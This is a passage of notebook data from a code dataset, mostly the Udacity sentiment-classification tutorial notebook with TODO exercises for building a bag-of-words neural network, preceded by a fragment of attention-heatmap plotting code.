"import matplotlib.pyplot as plt\n%matplotlib inline\nplt.hist(np.array(weights[0,:lenh,startd:].flatten()+1), bins=100);",
"_____no_output_____"
],
[
"import numpy as np\nfrom IPython.core.display import display, HTML\n\ndef heat(sample,weights,dark=0.3):\n weights = (weights - weights.min())/(weights.max() - weights.min() + 1e-4)\n html = ''\n fmt = ' <span style=\"background-color: #{0:x}{0:x}ff\">{1}</span>'\n for t,w in zip(sample,weights):\n c = int(256*((1.-dark)*(1.-w)+dark))\n html += fmt.format(c,idx2word[t])\n display(HTML(html))",
"_____no_output_____"
],
[
"heat(sample, weights[0,-1])",
"_____no_output_____"
],
[
"import pandas as pd\nimport seaborn as sns",
"_____no_output_____"
],
[
"columns = [idx2word[data[0,i]] for i in range(startd,maxlend)]\nrows = [idx2word[data[0,i]] for i in range(maxlend+1,maxlend+lenh+1)]",
"_____no_output_____"
],
[
"df = pd.DataFrame(weights[0,:lenh,startd:],columns=columns,index=rows)",
"_____no_output_____"
],
[
"sns.heatmap(df);",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e708fe23da3cffe9b6f420e1eb3cf609855c6701 | 101,540 | ipynb | Jupyter Notebook | sentiment-network/Sentiment_Classification_Projects.ipynb | jaknap32/Udacity_DeepLearning_Nanodegree | 158beda367171cea289a27ae15b5b2f20b6dc9ca | [
"MIT"
] | 1 | 2017-12-20T15:27:52.000Z | 2017-12-20T15:27:52.000Z | sentiment-network/Sentiment_Classification_Projects.ipynb | jaknap32/udacity_DeepLearning_Nanodegree | 158beda367171cea289a27ae15b5b2f20b6dc9ca | [
"MIT"
] | null | null | null | sentiment-network/Sentiment_Classification_Projects.ipynb | jaknap32/udacity_DeepLearning_Nanodegree | 158beda367171cea289a27ae15b5b2f20b6dc9ca | [
"MIT"
] | null | null | null | 52.448347 | 38,682 | 0.724562 | [
[
[
"# Sentiment Classification & How To \"Frame Problems\" for a Neural Network\n\nby Andrew Trask\n\n- **Twitter**: @iamtrask\n- **Blog**: http://iamtrask.github.io",
"_____no_output_____"
],
[
"### What You Should Already Know\n\n- neural networks, forward and back-propagation\n- stochastic gradient descent\n- mean squared error\n- and train/test splits\n\n### Where to Get Help if You Need it\n- Re-watch previous Udacity Lectures\n- Leverage the recommended Course Reading Material - [Grokking Deep Learning](https://www.manning.com/books/grokking-deep-learning) (Check inside your classroom for a discount code)\n- Shoot me a tweet @iamtrask\n\n\n### Tutorial Outline:\n\n- Intro: The Importance of \"Framing a Problem\" (this lesson)\n\n- [Curate a Dataset](#lesson_1)\n- [Developing a \"Predictive Theory\"](#lesson_2)\n- [**PROJECT 1**: Quick Theory Validation](#project_1)\n\n\n- [Transforming Text to Numbers](#lesson_3)\n- [**PROJECT 2**: Creating the Input/Output Data](#project_2)\n\n\n- Putting it all together in a Neural Network (video only - nothing in notebook)\n- [**PROJECT 3**: Building our Neural Network](#project_3)\n\n\n- [Understanding Neural Noise](#lesson_4)\n- [**PROJECT 4**: Making Learning Faster by Reducing Noise](#project_4)\n\n\n- [Analyzing Inefficiencies in our Network](#lesson_5)\n- [**PROJECT 5**: Making our Network Train and Run Faster](#project_5)\n\n\n- [Further Noise Reduction](#lesson_6)\n- [**PROJECT 6**: Reducing Noise by Strategically Reducing the Vocabulary](#project_6)\n\n\n- [Analysis: What's going on in the weights?](#lesson_7)",
"_____no_output_____"
],
[
"# Lesson: Curate a Dataset<a id='lesson_1'></a>\nThe cells from here until Project 1 include code Andrew shows in the videos leading up to mini project 1. We've included them so you can run the code along with the videos without having to type in everything.",
"_____no_output_____"
]
],
[
[
"def pretty_print_review_and_label(i):\n print(labels[i] + \"\\t:\\t\" + reviews[i][:80] + \"...\")\n\ng = open('reviews.txt','r') # What we know!\nreviews = list(map(lambda x:x[:-1],g.readlines()))\ng.close()\n\ng = open('labels.txt','r') # What we WANT to know!\nlabels = list(map(lambda x:x[:-1].upper(),g.readlines()))\ng.close()",
"_____no_output_____"
]
],
[
[
"**Note:** The data in `reviews.txt` we're using has already been preprocessed a bit and contains only lower case characters. If we were working from raw data, where we didn't know it was all lower case, we would want to add a step here to convert it. That's so we treat different variations of the same word, like `The`, `the`, and `THE`, all the same way.",
"_____no_output_____"
]
],
[
[
"len(reviews)",
"_____no_output_____"
],
[
"reviews[0]",
"_____no_output_____"
],
[
"labels[0]",
"_____no_output_____"
]
],
[
[
"# Lesson: Develop a Predictive Theory<a id='lesson_2'></a>",
"_____no_output_____"
]
],
[
[
"print(\"labels.txt \\t : \\t reviews.txt\\n\")\npretty_print_review_and_label(2137)\npretty_print_review_and_label(12816)\npretty_print_review_and_label(6267)\npretty_print_review_and_label(21934)\npretty_print_review_and_label(5297)\npretty_print_review_and_label(4998)",
"labels.txt \t : \t reviews.txt\n\nNEGATIVE\t:\tthis movie is terrible but it has some good effects . ...\nPOSITIVE\t:\tadrian pasdar is excellent is this film . he makes a fascinating woman . ...\nNEGATIVE\t:\tcomment this movie is impossible . is terrible very improbable bad interpretat...\nPOSITIVE\t:\texcellent episode movie ala pulp fiction . days suicides . it doesnt get more...\nNEGATIVE\t:\tif you haven t seen this it s terrible . it is pure trash . i saw this about ...\nPOSITIVE\t:\tthis schiffer guy is a real genius the movie is of excellent quality and both e...\n"
]
],
[
[
"# Project 1: Quick Theory Validation<a id='project_1'></a>\n\nThere are multiple ways to implement these projects, but in order to get your code closer to what Andrew shows in his solutions, we've provided some hints and starter code throughout this notebook.\n\nYou'll find the [Counter](https://docs.python.org/2/library/collections.html#collections.Counter) class to be useful in this exercise, as well as the [numpy](https://docs.scipy.org/doc/numpy/reference/) library.",
"_____no_output_____"
]
],
[
[
"from collections import Counter\nimport numpy as np",
"_____no_output_____"
]
],
[
[
"We'll create three `Counter` objects, one for words from postive reviews, one for words from negative reviews, and one for all the words.",
"_____no_output_____"
]
],
[
[
"# Create three Counter objects to store positive, negative and total counts\npositive_counts = Counter()\nnegative_counts = Counter()\ntotal_counts = Counter()",
"_____no_output_____"
]
],
[
[
"**TODO:** Examine all the reviews. For each word in a positive review, increase the count for that word in both your positive counter and the total words counter; likewise, for each word in a negative review, increase the count for that word in both your negative counter and the total words counter.\n\n**Note:** Throughout these projects, you should use `split(' ')` to divide a piece of text (such as a review) into individual words. If you use `split()` instead, you'll get slightly different results than what the videos and solutions show.",
"_____no_output_____"
]
],
[
[
"# TODO: Loop over all the words in all the reviews and increment the counts in the appropriate counter objects",
"_____no_output_____"
]
],
[
[
"Run the following two cells to list the words used in positive reviews and negative reviews, respectively, ordered from most to least commonly used. ",
"_____no_output_____"
]
],
[
[
"# Examine the counts of the most common words in positive reviews\npositive_counts.most_common()",
"_____no_output_____"
],
[
"# Examine the counts of the most common words in negative reviews\nnegative_counts.most_common()",
"_____no_output_____"
]
],
[
[
"As you can see, common words like \"the\" appear very often in both positive and negative reviews. Instead of finding the most common words in positive or negative reviews, what you really want are the words found in positive reviews more often than in negative reviews, and vice versa. To accomplish this, you'll need to calculate the **ratios** of word usage between positive and negative reviews.\n\n**TODO:** Check all the words you've seen and calculate the ratio of postive to negative uses and store that ratio in `pos_neg_ratios`. \n>Hint: the positive-to-negative ratio for a given word can be calculated with `positive_counts[word] / float(negative_counts[word]+1)`. Notice the `+1` in the denominator – that ensures we don't divide by zero for words that are only seen in positive reviews.",
"_____no_output_____"
]
],
[
[
"# Create Counter object to store positive/negative ratios\npos_neg_ratios = Counter()\n\n# TODO: Calculate the ratios of positive and negative uses of the most common words\n# Consider words to be \"common\" if they've been used at least 100 times",
"_____no_output_____"
]
],
[
[
"Examine the ratios you've calculated for a few words:",
"_____no_output_____"
]
],
[
[
"print(\"Pos-to-neg ratio for 'the' = {}\".format(pos_neg_ratios[\"the\"]))\nprint(\"Pos-to-neg ratio for 'amazing' = {}\".format(pos_neg_ratios[\"amazing\"]))\nprint(\"Pos-to-neg ratio for 'terrible' = {}\".format(pos_neg_ratios[\"terrible\"]))",
"_____no_output_____"
]
],
[
[
"Looking closely at the values you just calculated, we see the following:\n\n* Words that you would expect to see more often in positive reviews – like \"amazing\" – have a ratio greater than 1. The more skewed a word is toward postive, the farther from 1 its positive-to-negative ratio will be.\n* Words that you would expect to see more often in negative reviews – like \"terrible\" – have positive values that are less than 1. The more skewed a word is toward negative, the closer to zero its positive-to-negative ratio will be.\n* Neutral words, which don't really convey any sentiment because you would expect to see them in all sorts of reviews – like \"the\" – have values very close to 1. A perfectly neutral word – one that was used in exactly the same number of positive reviews as negative reviews – would be almost exactly 1. The `+1` we suggested you add to the denominator slightly biases words toward negative, but it won't matter because it will be a tiny bias and later we'll be ignoring words that are too close to neutral anyway.\n\nOk, the ratios tell us which words are used more often in postive or negative reviews, but the specific values we've calculated are a bit difficult to work with. A very positive word like \"amazing\" has a value above 4, whereas a very negative word like \"terrible\" has a value around 0.18. Those values aren't easy to compare for a couple of reasons:\n\n* Right now, 1 is considered neutral, but the absolute value of the postive-to-negative rations of very postive words is larger than the absolute value of the ratios for the very negative words. So there is no way to directly compare two numbers and see if one word conveys the same magnitude of positive sentiment as another word conveys negative sentiment. So we should center all the values around netural so the absolute value fro neutral of the postive-to-negative ratio for a word would indicate how much sentiment (positive or negative) that word conveys.\n* When comparing absolute values it's easier to do that around zero than one. \n\nTo fix these issues, we'll convert all of our ratios to new values using logarithms.\n\n**TODO:** Go through all the ratios you calculated and convert them to logarithms. (i.e. use `np.log(ratio)`)\n\nIn the end, extremely positive and extremely negative words will have positive-to-negative ratios with similar magnitudes but opposite signs.",
"_____no_output_____"
]
],
[
[
"# TODO: Convert ratios to logs",
"_____no_output_____"
]
],
[
[
"Examine the new ratios you've calculated for the same words from before:",
"_____no_output_____"
]
],
[
[
"print(\"Pos-to-neg ratio for 'the' = {}\".format(pos_neg_ratios[\"the\"]))\nprint(\"Pos-to-neg ratio for 'amazing' = {}\".format(pos_neg_ratios[\"amazing\"]))\nprint(\"Pos-to-neg ratio for 'terrible' = {}\".format(pos_neg_ratios[\"terrible\"]))",
"_____no_output_____"
]
],
[
[
"If everything worked, now you should see neutral words with values close to zero. In this case, \"the\" is near zero but slightly positive, so it was probably used in more positive reviews than negative reviews. But look at \"amazing\"'s ratio - it's above `1`, showing it is clearly a word with positive sentiment. And \"terrible\" has a similar score, but in the opposite direction, so it's below `-1`. It's now clear that both of these words are associated with specific, opposing sentiments.\n\nNow run the following cells to see more ratios. \n\nThe first cell displays all the words, ordered by how associated they are with postive reviews. (Your notebook will most likely truncate the output so you won't actually see *all* the words in the list.)\n\nThe second cell displays the 30 words most associated with negative reviews by reversing the order of the first list and then looking at the first 30 words. (If you want the second cell to display all the words, ordered by how associated they are with negative reviews, you could just write `reversed(pos_neg_ratios.most_common())`.)\n\nYou should continue to see values similar to the earlier ones we checked – neutral words will be close to `0`, words will get more positive as their ratios approach and go above `1`, and words will get more negative as their ratios approach and go below `-1`. That's why we decided to use the logs instead of the raw ratios.",
"_____no_output_____"
]
],
[
[
"# words most frequently seen in a review with a \"POSITIVE\" label\npos_neg_ratios.most_common()",
"_____no_output_____"
],
[
"# words most frequently seen in a review with a \"NEGATIVE\" label\nlist(reversed(pos_neg_ratios.most_common()))[0:30]\n\n# Note: Above is the code Andrew uses in his solution video, \n# so we've included it here to avoid confusion.\n# If you explore the documentation for the Counter class, \n# you will see you could also find the 30 least common\n# words like this: pos_neg_ratios.most_common()[:-31:-1]",
"_____no_output_____"
]
],
[
[
"# End of Project 1. \n## Watch the next video to see Andrew's solution, then continue on to the next lesson.\n\n# Transforming Text into Numbers<a id='lesson_3'></a>\nThe cells here include code Andrew shows in the next video. We've included it so you can run the code along with the video without having to type in everything.",
"_____no_output_____"
]
],
[
[
"from IPython.display import Image\n\nreview = \"This was a horrible, terrible movie.\"\n\nImage(filename='sentiment_network.png')",
"_____no_output_____"
],
[
"review = \"The movie was excellent\"\n\nImage(filename='sentiment_network_pos.png')",
"_____no_output_____"
]
],
[
[
"# Project 2: Creating the Input/Output Data<a id='project_2'></a>\n\n**TODO:** Create a [set](https://docs.python.org/3/tutorial/datastructures.html#sets) named `vocab` that contains every word in the vocabulary.",
"_____no_output_____"
]
],
[
[
"# TODO: Create set named \"vocab\" containing all of the words from all of the reviews\nvocab = None",
"_____no_output_____"
]
],
[
[
"Run the following cell to check your vocabulary size. If everything worked correctly, it should print **74074**",
"_____no_output_____"
]
],
[
[
"vocab_size = len(vocab)\nprint(vocab_size)",
"_____no_output_____"
]
],
[
[
"Take a look at the following image. It represents the layers of the neural network you'll be building throughout this notebook. `layer_0` is the input layer, `layer_1` is a hidden layer, and `layer_2` is the output layer.",
"_____no_output_____"
]
],
[
[
"from IPython.display import Image\nImage(filename='sentiment_network_2.png')",
"_____no_output_____"
]
],
[
[
"**TODO:** Create a numpy array called `layer_0` and initialize it to all zeros. You will find the [zeros](https://docs.scipy.org/doc/numpy/reference/generated/numpy.zeros.html) function particularly helpful here. Be sure you create `layer_0` as a 2-dimensional matrix with 1 row and `vocab_size` columns. ",
"_____no_output_____"
]
],
[
[
"# TODO: Create layer_0 matrix with dimensions 1 by vocab_size, initially filled with zeros\nlayer_0 = None",
"_____no_output_____"
]
],
[
[
"Run the following cell. It should display `(1, 74074)`",
"_____no_output_____"
]
],
[
[
"layer_0.shape",
"_____no_output_____"
],
[
"from IPython.display import Image\nImage(filename='sentiment_network.png')",
"_____no_output_____"
]
],
[
[
"`layer_0` contains one entry for every word in the vocabulary, as shown in the above image. We need to make sure we know the index of each word, so run the following cell to create a lookup table that stores the index of every word.",
"_____no_output_____"
]
],
[
[
"# Create a dictionary of words in the vocabulary mapped to index positions\n# (to be used in layer_0)\nword2index = {}\nfor i,word in enumerate(vocab):\n word2index[word] = i\n \n# display the map of words to indices\nword2index",
"_____no_output_____"
]
],
[
[
"**TODO:** Complete the implementation of `update_input_layer`. It should count \n how many times each word is used in the given review, and then store\n those counts at the appropriate indices inside `layer_0`.",
"_____no_output_____"
]
],
[
[
"def update_input_layer(review):\n \"\"\" Modify the global layer_0 to represent the vector form of review.\n The element at a given index of layer_0 should represent\n how many times the given word occurs in the review.\n Args:\n review(string) - the string of the review\n Returns:\n None\n \"\"\"\n global layer_0\n # clear out previous state by resetting the layer to be all 0s\n layer_0 *= 0\n \n # TODO: count how many times each word is used in the given review and store the results in layer_0 ",
"_____no_output_____"
]
],
[
[
"Run the following cell to test updating the input layer with the first review. The indices assigned may not be the same as in the solution, but hopefully you'll see some non-zero values in `layer_0`. ",
"_____no_output_____"
]
],
[
[
"update_input_layer(reviews[0])\nlayer_0",
"_____no_output_____"
]
],
[
[
"**TODO:** Complete the implementation of `get_target_for_labels`. It should return `0` or `1`, \n depending on whether the given label is `NEGATIVE` or `POSITIVE`, respectively.",
"_____no_output_____"
]
],
[
[
"def get_target_for_label(label):\n \"\"\"Convert a label to `0` or `1`.\n Args:\n label(string) - Either \"POSITIVE\" or \"NEGATIVE\".\n Returns:\n `0` or `1`.\n \"\"\"\n # TODO: Your code here",
"_____no_output_____"
]
],
[
[
"Run the following two cells. They should print out`'POSITIVE'` and `1`, respectively.",
"_____no_output_____"
]
],
[
[
"labels[0]",
"_____no_output_____"
],
[
"get_target_for_label(labels[0])",
"_____no_output_____"
]
],
[
[
"Run the following two cells. They should print out `'NEGATIVE'` and `0`, respectively.",
"_____no_output_____"
]
],
[
[
"labels[1]",
"_____no_output_____"
],
[
"get_target_for_label(labels[1])",
"_____no_output_____"
]
],
[
[
"# End of Project 2. \n## Watch the next video to see Andrew's solution, then continue on to the next lesson.",
"_____no_output_____"
],
[
"# Project 3: Building a Neural Network<a id='project_3'></a>",
"_____no_output_____"
],
[
"**TODO:** We've included the framework of a class called `SentimentNetork`. Implement all of the items marked `TODO` in the code. These include doing the following:\n- Create a basic neural network much like the networks you've seen in earlier lessons and in Project 1, with an input layer, a hidden layer, and an output layer. \n- Do **not** add a non-linearity in the hidden layer. That is, do not use an activation function when calculating the hidden layer outputs.\n- Re-use the code from earlier in this notebook to create the training data (see `TODO`s in the code)\n- Implement the `pre_process_data` function to create the vocabulary for our training data generating functions\n- Ensure `train` trains over the entire corpus",
"_____no_output_____"
],
[
"### Where to Get Help if You Need it\n- Re-watch earlier Udacity lectures\n- Chapters 3-5 - [Grokking Deep Learning](https://www.manning.com/books/grokking-deep-learning) - (Check inside your classroom for a discount code)",
"_____no_output_____"
]
],
[
[
"import time\nimport sys\nimport numpy as np\n\n# Encapsulate our neural network in a class\nclass SentimentNetwork:\n def __init__(self, reviews, labels, hidden_nodes = 10, learning_rate = 0.1):\n \"\"\"Create a SentimenNetwork with the given settings\n Args:\n reviews(list) - List of reviews used for training\n labels(list) - List of POSITIVE/NEGATIVE labels associated with the given reviews\n hidden_nodes(int) - Number of nodes to create in the hidden layer\n learning_rate(float) - Learning rate to use while training\n \n \"\"\"\n # Assign a seed to our random number generator to ensure we get\n # reproducable results during development \n np.random.seed(1)\n\n # process the reviews and their associated labels so that everything\n # is ready for training\n self.pre_process_data(reviews, labels)\n \n # Build the network to have the number of hidden nodes and the learning rate that\n # were passed into this initializer. Make the same number of input nodes as\n # there are vocabulary words and create a single output node.\n self.init_network(len(self.review_vocab),hidden_nodes, 1, learning_rate)\n\n def pre_process_data(self, reviews, labels):\n \n review_vocab = set()\n # TODO: populate review_vocab with all of the words in the given reviews\n # Remember to split reviews into individual words \n # using \"split(' ')\" instead of \"split()\".\n \n # Convert the vocabulary set to a list so we can access words via indices\n self.review_vocab = list(review_vocab)\n \n label_vocab = set()\n # TODO: populate label_vocab with all of the words in the given labels.\n # There is no need to split the labels because each one is a single word.\n \n # Convert the label vocabulary set to a list so we can access labels via indices\n self.label_vocab = list(label_vocab)\n \n # Store the sizes of the review and label vocabularies.\n self.review_vocab_size = len(self.review_vocab)\n self.label_vocab_size = len(self.label_vocab)\n \n # Create a dictionary of words in the vocabulary mapped to index positions\n self.word2index = {}\n # TODO: populate self.word2index with indices for all the words in self.review_vocab\n # like you saw earlier in the notebook\n \n # Create a dictionary of labels mapped to index positions\n self.label2index = {}\n # TODO: do the same thing you did for self.word2index and self.review_vocab, \n # but for self.label2index and self.label_vocab instead\n \n \n def init_network(self, input_nodes, hidden_nodes, output_nodes, learning_rate):\n # Store the number of nodes in input, hidden, and output layers.\n self.input_nodes = input_nodes\n self.hidden_nodes = hidden_nodes\n self.output_nodes = output_nodes\n\n # Store the learning rate\n self.learning_rate = learning_rate\n\n # Initialize weights\n \n # TODO: initialize self.weights_0_1 as a matrix of zeros. These are the weights between\n # the input layer and the hidden layer.\n self.weights_0_1 = None\n \n # TODO: initialize self.weights_1_2 as a matrix of random values. \n # These are the weights between the hidden layer and the output layer.\n self.weights_1_2 = None\n \n # TODO: Create the input layer, a two-dimensional matrix with shape \n # 1 x input_nodes, with all values initialized to zero\n self.layer_0 = np.zeros((1,input_nodes))\n \n \n def update_input_layer(self,review):\n # TODO: You can copy most of the code you wrote for update_input_layer \n # earlier in this notebook. \n #\n # However, MAKE SURE YOU CHANGE ALL VARIABLES TO REFERENCE\n # THE VERSIONS STORED IN THIS OBJECT, NOT THE GLOBAL OBJECTS.\n # For example, replace \"layer_0 *= 0\" with \"self.layer_0 *= 0\"\n pass\n \n def get_target_for_label(self,label):\n # TODO: Copy the code you wrote for get_target_for_label \n # earlier in this notebook. \n pass\n \n def sigmoid(self,x):\n # TODO: Return the result of calculating the sigmoid activation function\n # shown in the lectures\n pass\n \n def sigmoid_output_2_derivative(self,output):\n # TODO: Return the derivative of the sigmoid activation function, \n # where \"output\" is the original output from the sigmoid fucntion \n pass\n\n def train(self, training_reviews, training_labels):\n \n # make sure out we have a matching number of reviews and labels\n assert(len(training_reviews) == len(training_labels))\n \n # Keep track of correct predictions to display accuracy during training \n correct_so_far = 0\n \n # Remember when we started for printing time statistics\n start = time.time()\n\n # loop through all the given reviews and run a forward and backward pass,\n # updating weights for every item\n for i in range(len(training_reviews)):\n \n # TODO: Get the next review and its correct label\n \n # TODO: Implement the forward pass through the network. \n # That means use the given review to update the input layer, \n # then calculate values for the hidden layer,\n # and finally calculate the output layer.\n # \n # Do not use an activation function for the hidden layer,\n # but use the sigmoid activation function for the output layer.\n \n # TODO: Implement the back propagation pass here. \n # That means calculate the error for the forward pass's prediction\n # and update the weights in the network according to their\n # contributions toward the error, as calculated via the\n # gradient descent and back propagation algorithms you \n # learned in class.\n \n # TODO: Keep track of correct predictions. To determine if the prediction was\n # correct, check that the absolute value of the output error \n # is less than 0.5. If so, add one to the correct_so_far count.\n \n # For debug purposes, print out our prediction accuracy and speed \n # throughout the training process. \n\n elapsed_time = float(time.time() - start)\n reviews_per_second = i / elapsed_time if elapsed_time > 0 else 0\n \n sys.stdout.write(\"\\rProgress:\" + str(100 * i/float(len(training_reviews)))[:4] \\\n + \"% Speed(reviews/sec):\" + str(reviews_per_second)[0:5] \\\n + \" #Correct:\" + str(correct_so_far) + \" #Trained:\" + str(i+1) \\\n + \" Training Accuracy:\" + str(correct_so_far * 100 / float(i+1))[:4] + \"%\")\n if(i % 2500 == 0):\n print(\"\")\n \n def test(self, testing_reviews, testing_labels):\n \"\"\"\n Attempts to predict the labels for the given testing_reviews,\n and uses the test_labels to calculate the accuracy of those predictions.\n \"\"\"\n \n # keep track of how many correct predictions we make\n correct = 0\n\n # we'll time how many predictions per second we make\n start = time.time()\n\n # Loop through each of the given reviews and call run to predict\n # its label. \n for i in range(len(testing_reviews)):\n pred = self.run(testing_reviews[i])\n if(pred == testing_labels[i]):\n correct += 1\n \n # For debug purposes, print out our prediction accuracy and speed \n # throughout the prediction process. \n\n elapsed_time = float(time.time() - start)\n reviews_per_second = i / elapsed_time if elapsed_time > 0 else 0\n \n sys.stdout.write(\"\\rProgress:\" + str(100 * i/float(len(testing_reviews)))[:4] \\\n + \"% Speed(reviews/sec):\" + str(reviews_per_second)[0:5] \\\n + \" #Correct:\" + str(correct) + \" #Tested:\" + str(i+1) \\\n + \" Testing Accuracy:\" + str(correct * 100 / float(i+1))[:4] + \"%\")\n \n def run(self, review):\n \"\"\"\n Returns a POSITIVE or NEGATIVE prediction for the given review.\n \"\"\"\n # TODO: Run a forward pass through the network, like you did in the\n # \"train\" function. That means use the given review to \n # update the input layer, then calculate values for the hidden layer,\n # and finally calculate the output layer.\n #\n # Note: The review passed into this function for prediction \n # might come from anywhere, so you should convert it \n # to lower case prior to using it.\n \n # TODO: The output layer should now contain a prediction. \n # Return `POSITIVE` for predictions greater-than-or-equal-to `0.5`, \n # and `NEGATIVE` otherwise.\n pass\n",
"_____no_output_____"
]
],
[
[
"Run the following cell to create a `SentimentNetwork` that will train on all but the last 1000 reviews (we're saving those for testing). Here we use a learning rate of `0.1`.",
"_____no_output_____"
]
],
[
[
"mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.1)",
"_____no_output_____"
]
],
[
[
"Run the following cell to test the network's performance against the last 1000 reviews (the ones we held out from our training set). \n\n**We have not trained the model yet, so the results should be about 50% as it will just be guessing and there are only two possible values to choose from.**",
"_____no_output_____"
]
],
[
[
"mlp.test(reviews[-1000:],labels[-1000:])",
"_____no_output_____"
]
],
[
[
"Run the following cell to actually train the network. During training, it will display the model's accuracy repeatedly as it trains so you can see how well it's doing.",
"_____no_output_____"
]
],
[
[
"mlp.train(reviews[:-1000],labels[:-1000])",
"_____no_output_____"
]
],
[
[
"That most likely didn't train very well. Part of the reason may be because the learning rate is too high. Run the following cell to recreate the network with a smaller learning rate, `0.01`, and then train the new network.",
"_____no_output_____"
]
],
[
[
"mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.01)\nmlp.train(reviews[:-1000],labels[:-1000])",
"_____no_output_____"
]
],
[
[
"That probably wasn't much different. Run the following cell to recreate the network one more time with an even smaller learning rate, `0.001`, and then train the new network.",
"_____no_output_____"
]
],
[
[
"mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.001)\nmlp.train(reviews[:-1000],labels[:-1000])",
"_____no_output_____"
]
],
[
[
"With a learning rate of `0.001`, the network should finall have started to improve during training. It's still not very good, but it shows that this solution has potential. We will improve it in the next lesson.",
"_____no_output_____"
],
[
"# End of Project 3. \n## Watch the next video to see Andrew's solution, then continue on to the next lesson.",
"_____no_output_____"
],
[
"# Understanding Neural Noise<a id='lesson_4'></a>\n\nThe following cells include includes the code Andrew shows in the next video. We've included it here so you can run the cells along with the video without having to type in everything.",
"_____no_output_____"
]
],
[
[
"from IPython.display import Image\nImage(filename='sentiment_network.png')",
"_____no_output_____"
],
[
"def update_input_layer(review):\n \n global layer_0\n \n # clear out previous state, reset the layer to be all 0s\n layer_0 *= 0\n for word in review.split(\" \"):\n layer_0[0][word2index[word]] += 1\n\nupdate_input_layer(reviews[0])",
"_____no_output_____"
],
[
"layer_0",
"_____no_output_____"
],
[
"review_counter = Counter()",
"_____no_output_____"
],
[
"for word in reviews[0].split(\" \"):\n review_counter[word] += 1",
"_____no_output_____"
],
[
"review_counter.most_common()",
"_____no_output_____"
]
],
[
[
"# Project 4: Reducing Noise in Our Input Data<a id='project_4'></a>\n\n**TODO:** Attempt to reduce the noise in the input data like Andrew did in the previous video. Specifically, do the following:\n* Copy the `SentimentNetwork` class you created earlier into the following cell.\n* Modify `update_input_layer` so it does not count how many times each word is used, but rather just stores whether or not a word was used. ",
"_____no_output_____"
]
],
[
[
"# TODO: -Copy the SentimentNetwork class from Projet 3 lesson\n# -Modify it to reduce noise, like in the video ",
"_____no_output_____"
]
],
[
[
"Run the following cell to recreate the network and train it. Notice we've gone back to the higher learning rate of `0.1`.",
"_____no_output_____"
]
],
[
[
"mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.1)\nmlp.train(reviews[:-1000],labels[:-1000])",
"_____no_output_____"
]
],
[
[
"That should have trained much better than the earlier attempts. It's still not wonderful, but it should have improved dramatically. Run the following cell to test your model with 1000 predictions.",
"_____no_output_____"
]
],
[
[
"mlp.test(reviews[-1000:],labels[-1000:])",
"_____no_output_____"
]
],
[
[
"# End of Project 4. \n## Andrew's solution was actually in the previous video, so rewatch that video if you had any problems with that project. Then continue on to the next lesson.\n# Analyzing Inefficiencies in our Network<a id='lesson_5'></a>\nThe following cells include the code Andrew shows in the next video. We've included it here so you can run the cells along with the video without having to type in everything.",
"_____no_output_____"
]
],
[
[
"Image(filename='sentiment_network_sparse.png')",
"_____no_output_____"
],
[
"layer_0 = np.zeros(10)",
"_____no_output_____"
],
[
"layer_0",
"_____no_output_____"
],
[
"layer_0[4] = 1\nlayer_0[9] = 1",
"_____no_output_____"
],
[
"layer_0",
"_____no_output_____"
],
[
"weights_0_1 = np.random.randn(10,5)",
"_____no_output_____"
],
[
"layer_0.dot(weights_0_1)",
"_____no_output_____"
],
[
"indices = [4,9]",
"_____no_output_____"
],
[
"layer_1 = np.zeros(5)",
"_____no_output_____"
],
[
"for index in indices:\n layer_1 += (1 * weights_0_1[index])",
"_____no_output_____"
],
[
"layer_1",
"_____no_output_____"
],
[
"Image(filename='sentiment_network_sparse_2.png')",
"_____no_output_____"
],
[
"layer_1 = np.zeros(5)",
"_____no_output_____"
],
[
"for index in indices:\n layer_1 += (weights_0_1[index])",
"_____no_output_____"
],
[
"layer_1",
"_____no_output_____"
]
],
[
[
"# Project 5: Making our Network More Efficient<a id='project_5'></a>\n**TODO:** Make the `SentimentNetwork` class more efficient by eliminating unnecessary multiplications and additions that occur during forward and backward propagation. To do that, you can do the following:\n* Copy the `SentimentNetwork` class from the previous project into the following cell.\n* Remove the `update_input_layer` function - you will not need it in this version.\n* Modify `init_network`:\n>* You no longer need a separate input layer, so remove any mention of `self.layer_0`\n>* You will be dealing with the old hidden layer more directly, so create `self.layer_1`, a two-dimensional matrix with shape 1 x hidden_nodes, with all values initialized to zero\n* Modify `train`:\n>* Change the name of the input parameter `training_reviews` to `training_reviews_raw`. This will help with the next step.\n>* At the beginning of the function, you'll want to preprocess your reviews to convert them to a list of indices (from `word2index`) that are actually used in the review. This is equivalent to what you saw in the video when Andrew set specific indices to 1. Your code should create a local `list` variable named `training_reviews` that should contain a `list` for each review in `training_reviews_raw`. Those lists should contain the indices for words found in the review.\n>* Remove call to `update_input_layer`\n>* Use `self`'s `layer_1` instead of a local `layer_1` object.\n>* In the forward pass, replace the code that updates `layer_1` with new logic that only adds the weights for the indices used in the review.\n>* When updating `weights_0_1`, only update the individual weights that were used in the forward pass.\n* Modify `run`:\n>* Remove 